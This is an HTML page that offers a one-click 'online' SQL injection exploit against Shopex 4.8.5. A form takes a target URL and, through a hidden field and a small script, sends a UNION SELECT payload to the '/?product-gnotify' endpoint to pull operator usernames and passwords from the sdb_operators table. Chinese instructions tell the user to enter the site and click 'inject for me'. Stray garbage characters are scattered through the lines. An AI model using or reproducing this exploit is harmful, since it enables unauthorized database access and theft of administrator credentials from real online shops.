<center>
( w+ z, b% V2 X" T2 T<title>中国网络渗透测评联盟-中测联盟|-Shopex 4.8.5 SQL Injection Exp 在线版</title>
- k0 B$ L( g7 X' u$ y" \<form action="" method="post" name="submit_url">
0 k! J/ a: L$ d3 `1 t" Z# @网址:<input type=text name=url value="http://www.political-security.com/" size=62><br><br>
' q3 K2 C, P+ H) w; f<input type="hidden" name="goods[goods_id]" value="3">
' r+ Y+ }8 b7 S g& s, i<input type="hidden" name="goods[product_id]" value="1 and 1=2 union select 1,2,3,4,5,6,7,8,concat(0x245E,username,0x2D3E,userpass,0x5E24),10,11,12,13,14,15,16,17,18,19,20,21,22 from sdb_operators">5 H6 O1 b' H2 V! v
<input type="submit" value="给我注入" onclick=fsubmit()>& {& p" h0 ]) |1 _1 A9 _
</form> <br /><br />填上你要注入的网址(注意要打上http:// 要不跳转不了) 点“给我注入”就要以了。//www.political-security.com
& R% h, B% Z5 p" I3 w* |# V/ ]3 M M( a
<script>
2 V* h" k" D) S+ M' B- s0 Mfunction fsubmit(){
7 r: S6 v' {. P4 g9 Qform = document.forms[0];
( ?1 H% m# r' G1 L0 k/ n# i- uform.action = form.url.value+'/?product-gnotify';
2 W/ j: f7 @5 Dform.submit(); ( u5 r( Q" [9 k! z' k% I' a
}
8 D8 s8 Y4 {! ]" C! F! E$ i+ @</script>
) L( ^2 W+ O4 _4 c9 r/ q |